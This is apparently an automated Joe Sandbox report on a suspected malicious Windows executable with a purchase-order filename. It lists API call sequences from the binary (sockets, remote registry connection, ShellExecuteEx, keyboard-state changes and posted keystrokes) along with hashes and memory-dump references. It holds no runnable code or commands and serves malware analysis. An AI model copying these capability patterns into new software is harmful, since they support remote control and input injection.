                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: 1634baa97eef771927cbc17e996d90081ff45c4531587c2aceec184b2b439feb
                                                                                        • Instruction ID: e319d91088924f29c8e6c2881ae07b0981255959359ee2b76a998b0d449b1f2a
                                                                                        • Opcode Fuzzy Hash: 1634baa97eef771927cbc17e996d90081ff45c4531587c2aceec184b2b439feb
                                                                                        • Instruction Fuzzy Hash: F3C1707590821ADFDB00DF94D481BAEB7F4FF0A315F2084AAE615E7381D735A941CBA1
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BA6B63
                                                                                        • LoadStringW.USER32(00000000), ref: 00BA6B6A
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BA6B80
                                                                                        • LoadStringW.USER32(00000000), ref: 00BA6B87
                                                                                        • _wprintf.LIBCMT ref: 00BA6BAD
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA6BCB
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00BA6BA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
                                                                                        • Instruction ID: 07c810669c2139e377936e21f45946f0e68c20a4ccc10af64dbf950b9029f888
                                                                                        • Opcode Fuzzy Hash: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
                                                                                        • Instruction Fuzzy Hash: 85014FF2500248BFEB11A7949DC9EE633ACEB04304F4044A5B745EA051EAB4DE848F71
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2BF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 2595220575-0
                                                                                        • Opcode ID: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
                                                                                        • Instruction ID: 643f6c44307bde709ebc618b486164e470853fbdc9fdab1b758e4b3fa79f59c5
                                                                                        • Opcode Fuzzy Hash: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
                                                                                        • Instruction Fuzzy Hash: 0E916E716042019FCB01EF54C891F6EBBE5FF58310F04889DF9969B2A2DB75E945CB42
                                                                                        APIs
                                                                                        • select.WSOCK32 ref: 00BB9691
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB969E
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00BB96C8
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BB96E9
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB96F8
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00BB9765
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00BB97AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                        • String ID:
                                                                                        • API String ID: 500251541-0
                                                                                        • Opcode ID: d2f0acc830d01662803f3c2de6f743ac29ccc2d1453cd4a64d7d0153cc3b57a2
                                                                                        • Instruction ID: 39491b6b5309cd660357c6619ab6f48ee5b7aa5ae89b4ea2ed97655174dbe959
                                                                                        • Opcode Fuzzy Hash: d2f0acc830d01662803f3c2de6f743ac29ccc2d1453cd4a64d7d0153cc3b57a2
                                                                                        • Instruction Fuzzy Hash: 0371CC31504240AFC710EF64CC85EABB7E8EF85714F104A9DF5569B2A1EBB0DD04CB92
                                                                                        APIs
                                                                                        • __mtinitlocknum.LIBCMT ref: 00B8A991
                                                                                          • Part of subcall function 00B87D7C: __FF_MSGBANNER.LIBCMT ref: 00B87D91
                                                                                          • Part of subcall function 00B87D7C: __NMSG_WRITE.LIBCMT ref: 00B87D98
                                                                                          • Part of subcall function 00B87D7C: __malloc_crt.LIBCMT ref: 00B87DB8
                                                                                        • __lock.LIBCMT ref: 00B8A9A4
                                                                                        • __lock.LIBCMT ref: 00B8A9F0
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00C16DE0,00000018,00B95E7B,?,00000000,00000109), ref: 00B8AA0C
                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00C16DE0,00000018,00B95E7B,?,00000000,00000109), ref: 00B8AA29
                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00B8AA39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1422805418-0
                                                                                        • Opcode ID: 92fe18c120e26487152d34aab2c0271cad68f5cdc4ebbba37bb87a551db9f25d
                                                                                        • Instruction ID: 2d425eaaa2a45c4a2fd80891501fbe3f63036b6101ebbd8970a3e61f7bc0a2f9
                                                                                        • Opcode Fuzzy Hash: 92fe18c120e26487152d34aab2c0271cad68f5cdc4ebbba37bb87a551db9f25d
                                                                                        • Instruction Fuzzy Hash: A8412D719002059BFB28BF68D98575CB7F0EF01335F20439AE425AB5F1DBB49941CB92
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BC8EE4
                                                                                        • GetDC.USER32(00000000), ref: 00BC8EEC
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC8EF7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00BC8F03
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00BC8F3F
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BC8F50
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BCBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00BC8F8A
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BC8FAA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: 2edabddd1895c7ea0d2f462bf22269f658ebfdc9d8606f390406b9713b041a23
                                                                                        • Instruction ID: 0d7023ba58cf755422c0a0536f42cc46a95902eacb5b0f2f9adab2536117795b
                                                                                        • Opcode Fuzzy Hash: 2edabddd1895c7ea0d2f462bf22269f658ebfdc9d8606f390406b9713b041a23
                                                                                        • Instruction Fuzzy Hash: FD314D72100254BFEB118F50CC89FEA3BA9EF49755F084069FE099F191DAB59841CBB4
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                          • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                                                        • _wcstok.LIBCMT ref: 00BB184E
                                                                                        • _wcscpy.LIBCMT ref: 00BB18DD
                                                                                        • _memset.LIBCMT ref: 00BB1910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 5631ff50a0e490631b75741be2fcb0b5b25a9fb4e9d3088d6a2373d49e54c455
                                                                                        • Instruction ID: 37f762ec430198dd92c85e782281b83ed2f93ab3ade47f1ae4621b261ea6c982
                                                                                        • Opcode Fuzzy Hash: 5631ff50a0e490631b75741be2fcb0b5b25a9fb4e9d3088d6a2373d49e54c455
                                                                                        • Instruction Fuzzy Hash: 83C1A1716043409FC724EF28C991AAEB7E4FF85350F4449ADF899972A2DB70ED45CB82
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00BD016D
                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00BD038D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BD03AB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00BD03D6
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BD03FF
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00BD0421
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BD0440
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3356174886-0
                                                                                        • Opcode ID: f6048382b0a9bae9198ad24df827fc218c0e45d577f8ef568bec8badb06db692
                                                                                        • Instruction ID: 44ac1223ffadb83be157387b9ef3921029997d9e898515d73e9286365158dca7
                                                                                        • Opcode Fuzzy Hash: f6048382b0a9bae9198ad24df827fc218c0e45d577f8ef568bec8badb06db692
                                                                                        • Instruction Fuzzy Hash: 99A17C35610616AFDB18DF68C9857ADFBF1FB48710F048196EC54AB390E774AD50CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b2079cc878baba11460231c530b0951913362f15c64327f58d9559d235a8f563
                                                                                        • Instruction ID: ff44896d098520b86bac65bac8a4deb452b5ceec74d6ef009eac2a92cafb7e95
                                                                                        • Opcode Fuzzy Hash: b2079cc878baba11460231c530b0951913362f15c64327f58d9559d235a8f563
                                                                                        • Instruction Fuzzy Hash: 6E715C71904109AFCB14DF98CC85AAEBBB4FF85314F14C199F929AB251D730AA41CF65
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BC225A
                                                                                        • _memset.LIBCMT ref: 00BC2323
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00BC2368
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                          • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BC242F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00BC243E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 4082843840-2766056989
                                                                                        • Opcode ID: e0ac2da01158e33e0c321b0437d8774cf54903a47d4127ac41ca5045ad7fc8a8
                                                                                        • Instruction ID: 660fcf5dfd5ae73e46ebd0221f6392b3f8b9e5884a0b4ab0bbe2b5972886cff6
                                                                                        • Opcode Fuzzy Hash: e0ac2da01158e33e0c321b0437d8774cf54903a47d4127ac41ca5045ad7fc8a8
                                                                                        • Instruction Fuzzy Hash: F5714D75A00619DFCF05EFA4C891AAEBBF5FF48310F1084A9E859AB351DB34AD40CB94
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00BA3DE7
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA3DFC
                                                                                        • SetKeyboardState.USER32(?), ref: 00BA3E5D
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BA3E8B
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BA3EAA
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BA3EF0
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BA3F13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: d88e2499d913dae74a9d66834ffad8c672322bafec5af31fcb24d5fc55d3ec02
                                                                                        • Instruction ID: 161c5bf7d3672d2a02555e5e82b2b689f7162c0cdb04096cd61a15594cac1358
                                                                                        • Opcode Fuzzy Hash: d88e2499d913dae74a9d66834ffad8c672322bafec5af31fcb24d5fc55d3ec02
                                                                                        • Instruction Fuzzy Hash: 1851C1A0A1C7D53DFB3643288845BBA7EE99B07B04F0845C9F0D55A8C2D7E5AEC4D760
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00BA3C02
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA3C17
                                                                                        • SetKeyboardState.USER32(?), ref: 00BA3C78
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BA3CA4
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BA3CC1
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BA3D05
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BA3D26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 8ba907bfa136d3caed965415ae1b4cad32806044cd4c924b669a744da24a63ae
                                                                                        • Instruction ID: b561571da5cf7ead1da1f629ac72c6c33f1ef31b4a2db53146f0872ef2e93e5d
                                                                                        • Opcode Fuzzy Hash: 8ba907bfa136d3caed965415ae1b4cad32806044cd4c924b669a744da24a63ae
                                                                                        • Instruction Fuzzy Hash: 9451F6A050C7D57DFB3287248C56BBABED9EB07B00F0884D9F0D55A8C2E695EE84D760
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 6227f75828aea56832cc7578e1e83c4f237b0a25a05936e825c49f4e59ba051b
                                                                                        • Instruction ID: ee0c9c6c9aabc0544f1499c003b4f43b8c9172e6251c512251019ab395d61c03
                                                                                        • Opcode Fuzzy Hash: 6227f75828aea56832cc7578e1e83c4f237b0a25a05936e825c49f4e59ba051b
                                                                                        • Instruction Fuzzy Hash: A6414C66D29214BADB10BBF48C469CFB7ECEF05310F5089E6E905E3121FA34E615C7A9
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BC8FE7
                                                                                        • GetWindowLongW.USER32(0193E750,000000F0), ref: 00BC901A
                                                                                        • GetWindowLongW.USER32(0193E750,000000F0), ref: 00BC904F
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BC9081
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BC90AB
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BC90BC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BC90D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: 505704c3579ecdf50e8c8f6dbb7d597dac0af82fe26ec8d06e5dd59aebec643f
                                                                                        • Instruction ID: b2b65056ec6384868d781082fee92e4be252cae45960e7f52ffd7406e9f8cdf0
                                                                                        • Opcode Fuzzy Hash: 505704c3579ecdf50e8c8f6dbb7d597dac0af82fe26ec8d06e5dd59aebec643f
                                                                                        • Instruction Fuzzy Hash: 92312435640215EFEB21CF58DC88F6837E6FB5A714F1802A8F9198F2B1CBB1A841DB41
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA08F2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA0918
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BA091B
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00BA0939
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00BA0942
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA0967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00BA0975
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: c3851bbb005a90207e80aa86ae65bfffc4748889ba8ff6a7c4ce0a51163aae39
                                                                                        • Instruction ID: b1bb1961d4b641f9aff0d6717098e42e87f5ec628f20578bf47429219af32855
                                                                                        • Opcode Fuzzy Hash: c3851bbb005a90207e80aa86ae65bfffc4748889ba8ff6a7c4ce0a51163aae39
                                                                                        • Instruction Fuzzy Hash: 04219576605219AFAB10AF6CCC88DBB73ECEB09360F408165F919DB291DA70EC458B64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
